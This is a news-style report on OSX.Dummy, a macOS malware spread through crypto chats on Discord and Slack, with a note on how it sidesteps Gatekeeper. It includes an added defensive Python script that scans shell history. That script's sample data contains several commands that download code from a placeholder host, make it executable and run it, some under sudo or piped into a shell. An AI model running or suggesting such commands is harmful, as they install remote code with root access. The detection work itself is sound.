Security researchers have uncovered a new threat targeting Mac owners who discuss cryptocurrencies on chat platforms such as Discord and Slack. According to security researcher Remco Verhoef, multiple attacks by this malware have been observed in cryptocurrency-related chats on the popular official Discord and Slack platforms. The attackers infiltrate these groups posing as key administrators and share small command snippets; a user who runs them downloads and executes the malicious binary.
Patrick Wardle of Digita Security wrote in his Objective-See post of 29th June that the attackers are effectively asking users to infect their own systems. If someone falls for this obvious trap and runs the snippet, the “OSX.Dummy” binary lands in the tmp/macOS/script directory, from where it accesses data on the system. The file delivered via the chat snippet is a hefty 34MB.
Once executed, the malware attempts to run the sudo command through the Terminal. This succeeds only if the user is logged into a password-protected administrator account. The victim is then prompted to enter that password, which grants the malware root access.
Even though OSX.Dummy is unsigned, it evades Gatekeeper, the macOS feature that blocks execution of unsigned files. This works because the victim downloads the binary directly via terminal commands: Gatekeeper only inspects files carrying the quarantine attribute that browsers and other quarantine-aware apps set on downloads, and a file fetched with curl in the Terminal never receives it, so Gatekeeper is never consulted and the payload runs unchallenged.
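As an added example (not code from the article or from the researchers it cites), here is a small Python triage script that scans shell history for the chain the article describes: a curl or wget download to a path, chmod +x, then execution, optionally under sudo, plus the shorter curl-piped-into-a-shell form. The sample history lines and the EXAMPLE-HOST placeholder are constructed.

```python
import re

# Constructed sample shell history (not from the article); EXAMPLE-HOST is a placeholder.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -s http://EXAMPLE-HOST/script -o /tmp/script",
    "chmod +x /tmp/script",
    "sudo /tmp/script",
    "brew update",
    "wget -q http://EXAMPLE-HOST/tool -O /tmp/tool && chmod +x /tmp/tool && /tmp/tool",
    "curl -s http://EXAMPLE-HOST/notes.txt -o ~/notes.txt",
    "curl -sL http://EXAMPLE-HOST/install.sh | sudo sh",
]

DOWNLOAD_RE = re.compile(r"^(?:curl|wget)\b.*?\s(?:-o|-O|--output)\s*(\S+)")  # save to <path>
CHMOD_RE = re.compile(r"^chmod\s+(?:[ua]?\+x|[0-7]{3,4})\s+(\S+)")            # mark executable
EXEC_RE = re.compile(r"^(sudo\s+)?(\S+)")                                      # run <path>, maybe via sudo
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(sudo\s+)?(?:ba|z)?sh\b")  # curl ... | sh

def split_commands(line):
    """Split one history line on shell chaining operators (&&, ||, ;, |)."""
    return [c.strip() for c in re.split(r"\s*(?:&&|\|\||;|\|)\s*", line) if c.strip()]

def triage_history(lines, window=5):
    """Flag download -> chmod +x -> run chains within `window` lines, and curl|sh one-liners.
    Each finding: path (None for pipe-to-shell), sudo flag, (download, chmod, run) indices."""
    pending = {}  # path -> {"download": idx, "chmod": idx or None}
    findings = []
    for idx, line in enumerate(lines):
        m = PIPE_TO_SHELL_RE.search(line)
        if m:  # download fed straight into a shell, so there is no file on disk to inspect
            findings.append({"path": None, "sudo": bool(m.group(1)), "lines": (idx, idx, idx)})
            continue
        for cmd in split_commands(line):
            m = DOWNLOAD_RE.match(cmd)
            if m:
                pending[m.group(1)] = {"download": idx, "chmod": None}
                continue
            m = CHMOD_RE.match(cmd)
            if m and m.group(1) in pending:
                pending[m.group(1)]["chmod"] = idx
                continue
            m = EXEC_RE.match(cmd)
            if m and m.group(2) in pending:
                rec = pending.pop(m.group(2))
                if rec["chmod"] is not None and idx - rec["download"] <= window:
                    findings.append({"path": m.group(2), "sudo": bool(m.group(1)),
                                     "lines": (rec["download"], rec["chmod"], idx)})
    return findings
```

Running `triage_history` over a user's real history file would flag both the /tmp binary chain and the piped install one-liner while ignoring ordinary downloads that are never made executable.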
Initially, VirusTotal showed zero detections out of 60 engines, meaning no AV recognized the file as malicious. By the time of writing, however, 11 of the 60 anti-virus engines detected it, which is good news for unsuspecting users.
Although described as a primitive virus, OSX.Dummy can still inflict a great deal of damage on the system of anyone naive enough to download and run the binary. The malware connects to the adversary's C&C server, which effectively lets the bad actors take over the system and steal private information.